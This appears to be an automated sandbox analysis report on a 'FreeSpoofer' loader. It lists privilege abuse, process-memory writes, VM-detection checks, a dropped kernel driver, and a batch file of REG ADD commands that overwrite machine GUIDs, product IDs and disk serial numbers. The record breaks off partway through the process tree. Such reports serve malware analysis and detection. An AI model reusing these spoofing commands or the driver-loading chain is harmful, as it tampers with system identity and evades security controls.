description pid Process Token: SeDebugPrivilege 3548 Loader.exe Token: SeLoadDriverPrivilege 752 xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe Token: SeDebugPrivilege 3148 VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeIncreaseQuotaPrivilege 1468 powershell.exe Token: SeSecurityPrivilege 1468 powershell.exe Token: SeTakeOwnershipPrivilege 1468 powershell.exe Token: SeLoadDriverPrivilege 1468 powershell.exe Token: SeSystemProfilePrivilege 1468 powershell.exe Token: SeSystemtimePrivilege 1468 powershell.exe Token: SeProfSingleProcessPrivilege 1468 powershell.exe Token: SeIncBasePriorityPrivilege 1468 powershell.exe Token: SeCreatePagefilePrivilege 1468 powershell.exe Token: SeBackupPrivilege 1468 powershell.exe Token: SeRestorePrivilege 1468 powershell.exe Token: SeShutdownPrivilege 1468 powershell.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeSystemEnvironmentPrivilege 1468 powershell.exe Token: SeRemoteShutdownPrivilege 1468 powershell.exe Token: SeUndockPrivilege 1468 powershell.exe Token: SeManageVolumePrivilege 1468 powershell.exe Token: 33 1468 powershell.exe Token: 34 1468 powershell.exe Token: 35 1468 powershell.exe Token: 36 1468 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeIncreaseQuotaPrivilege 1764 powershell.exe Token: SeSecurityPrivilege 1764 powershell.exe Token: SeTakeOwnershipPrivilege 1764 powershell.exe Token: SeLoadDriverPrivilege 1764 powershell.exe Token: SeSystemProfilePrivilege 1764 powershell.exe Token: SeSystemtimePrivilege 1764 powershell.exe Token: SeProfSingleProcessPrivilege 1764 powershell.exe Token: SeIncBasePriorityPrivilege 1764 powershell.exe Token: SeCreatePagefilePrivilege 1764 powershell.exe Token: SeBackupPrivilege 1764 powershell.exe Token: SeRestorePrivilege 1764 powershell.exe Token: SeShutdownPrivilege 1764 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeSystemEnvironmentPrivilege 1764 powershell.exe Token: SeRemoteShutdownPrivilege 1764 powershell.exe Token: SeUndockPrivilege 1764 powershell.exe Token: SeManageVolumePrivilege 1764 powershell.exe Token: 33 1764 powershell.exe Token: 34 1764 powershell.exe Token: 35 1764 powershell.exe Token: 36 1764 powershell.exe Token: SeIncreaseQuotaPrivilege 1764 powershell.exe Token: SeSecurityPrivilege 1764 powershell.exe Token: SeTakeOwnershipPrivilege 1764 powershell.exe Token: SeLoadDriverPrivilege 1764 powershell.exe Token: SeSystemProfilePrivilege 1764 powershell.exe Token: SeSystemtimePrivilege 1764 powershell.exe Token: SeProfSingleProcessPrivilege 1764 powershell.exe Token: SeIncBasePriorityPrivilege 1764 powershell.exe Token: SeCreatePagefilePrivilege 1764 powershell.exe Token: SeBackupPrivilege 1764 powershell.exe Token: SeRestorePrivilege 1764 powershell.exe Token: SeShutdownPrivilege 1764 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeSystemEnvironmentPrivilege 1764 powershell.exe Token: SeRemoteShutdownPrivilege 1764 powershell.exe Token: SeUndockPrivilege 1764 powershell.exe Token: SeManageVolumePrivilege 1764 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3548 Loader.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3548 wrote to memory of 752 3548 Loader.exe 102 PID 3548 wrote to memory of 752 3548 Loader.exe 102 PID 3548 wrote to memory of 3148 3548 Loader.exe 104 PID 3548 wrote to memory of 3148 3548 Loader.exe 104 PID 3548 wrote to memory of 3148 3548 Loader.exe 104 PID 3148 wrote to memory of 4052 3148 VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe 106 PID 3148 wrote to memory of 4052 3148 VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe 106 PID 3148 wrote to memory of 4052 3148 VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe 106 PID 4052 wrote to memory of 3604 4052 cmd.exe 108 PID 4052 wrote to memory of 3604 4052 cmd.exe 108 PID 4052 wrote to memory of 3604 4052 cmd.exe 108 PID 4052 wrote to memory of 3492 4052 cmd.exe 109 PID 4052 wrote to memory of 3492 4052 cmd.exe 109 PID 4052 wrote to memory of 3492 4052 cmd.exe 109 PID 4052 wrote to memory of 2484 4052 cmd.exe 110 PID 4052 wrote to memory of 2484 4052 cmd.exe 110 PID 4052 wrote to memory of 2484 4052 cmd.exe 110 PID 4052 wrote to memory of 4760 4052 cmd.exe 111 PID 4052 wrote to memory of 4760 4052 cmd.exe 111 PID 4052 wrote to memory of 4760 4052 cmd.exe 111 PID 4052 wrote to memory of 4092 4052 cmd.exe 112 PID 4052 wrote to memory of 4092 4052 cmd.exe 112 PID 4052 wrote to memory of 4092 4052 cmd.exe 112 PID 4052 wrote to memory of 4600 4052 cmd.exe 113 PID 4052 wrote to memory of 4600 4052 cmd.exe 113 PID 4052 wrote to memory of 4600 4052 cmd.exe 113 PID 4052 wrote to memory of 4904 4052 cmd.exe 114 PID 4052 wrote to memory of 4904 4052 cmd.exe 114 PID 4052 wrote to memory of 4904 4052 cmd.exe 114 PID 4052 wrote to memory of 2700 4052 cmd.exe 115 PID 4052 wrote to memory of 2700 4052 cmd.exe 115 PID 4052 wrote to memory of 2700 4052 cmd.exe 115 PID 4052 wrote to memory of 3872 4052 cmd.exe 116 PID 4052 wrote to memory of 3872 4052 cmd.exe 116 PID 4052 wrote to memory of 3872 4052 cmd.exe 116 PID 4052 wrote to memory of 2168 4052 cmd.exe 117 PID 4052 wrote to memory of 2168 4052 cmd.exe 117 PID 4052 wrote to memory of 2168 4052 cmd.exe 117 PID 4052 wrote to memory of 1552 4052 cmd.exe 118 PID 4052 wrote to memory of 1552 4052 cmd.exe 118 PID 4052 wrote to memory of 1552 4052 cmd.exe 118 PID 4052 wrote to memory of 976 4052 cmd.exe 119 PID 4052 wrote to memory of 976 4052 cmd.exe 119 PID 4052 wrote to memory of 976 4052 cmd.exe 119 PID 4052 wrote to memory of 4504 4052 cmd.exe 120 PID 4052 wrote to memory of 4504 4052 cmd.exe 120 PID 4052 wrote to memory of 4504 4052 cmd.exe 120 PID 4052 wrote to memory of 4640 4052 cmd.exe 121 PID 4052 wrote to memory of 4640 4052 cmd.exe 121 PID 4052 wrote to memory of 4640 4052 cmd.exe 121 PID 4052 wrote to memory of 1952 4052 cmd.exe 122 PID 4052 wrote to memory of 1952 4052 cmd.exe 122 PID 4052 wrote to memory of 1952 4052 cmd.exe 122 PID 4052 wrote to memory of 2816 4052 cmd.exe 123 PID 4052 wrote to memory of 2816 4052 cmd.exe 123 PID 4052 wrote to memory of 2816 4052 cmd.exe 123 PID 4052 wrote to memory of 3780 4052 cmd.exe 124 PID 4052 wrote to memory of 3780 4052 cmd.exe 124 PID 4052 wrote to memory of 3780 4052 cmd.exe 124 PID 4052 wrote to memory of 2692 4052 cmd.exe 125 PID 4052 wrote to memory of 2692 4052 cmd.exe 125 PID 4052 wrote to memory of 2692 4052 cmd.exe 125 PID 4052 wrote to memory of 4608 4052 cmd.exe 126 PID 4052 wrote to memory of 4608 4052 cmd.exe 126 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3560
-
C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Maps connected drives based on registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\ProgramData\Microsoft\xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe"C:\ProgramData\Microsoft\xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe" C:\ProgramData\GRKkBFtqWWGouHRvxyfYvSWjsufZiG.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\Users\Admin\AppData\Local\Microsoft\VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe"C:\Users\Admin\AppData\Local\Microsoft\VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uwkahbv.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:3604
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:3492
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:2484
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:4760
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:4092
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:4600
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:4904
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:2700
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:3872
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 059F556651A6A866 /f5⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"5⤵
- Enumerates system info in registry
PID:4504
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 1307987-b2d44ef9-A /f5⤵
- Enumerates system info in registry
PID:4640
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"5⤵
- Enumerates system info in registry
PID:1952
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"5⤵
- Enumerates system info in registry
PID:2816
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3780
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2692
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"5⤵
- Enumerates system info in registry
PID:4608
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"5⤵
- Enumerates system info in registry
PID:1816
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"5⤵
- Enumerates system info in registry
PID:188
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"5⤵
- Enumerates system info in registry
PID:2752
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul5⤵PID:2292
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"6⤵PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0" 2>nul5⤵PID:1236
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0"6⤵PID:420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:544
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0"6⤵PID:4468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:744
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:932
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:2592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:4256
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:1428 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2192 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:4000
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
- System Location Discovery: System Language Discovery
PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:1144 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:1796
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
- System Location Discovery: System Language Discovery
PID:3528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:4500
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:64
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵PID:5036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4404 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:3992
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵PID:708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:2092
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:4472
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
- System Location Discovery: System Language Discovery
PID:4156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:4548
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵PID:2968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:4492
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:4332
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:3120
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:4896
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:644
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵PID:988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵PID:2576
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:5024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:1884 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:1748
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵PID:4484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:1364
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:5044
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵PID:4616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1" 2>nul5⤵PID:4956
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1"6⤵PID:3036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:4284
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0"6⤵PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:2196
-
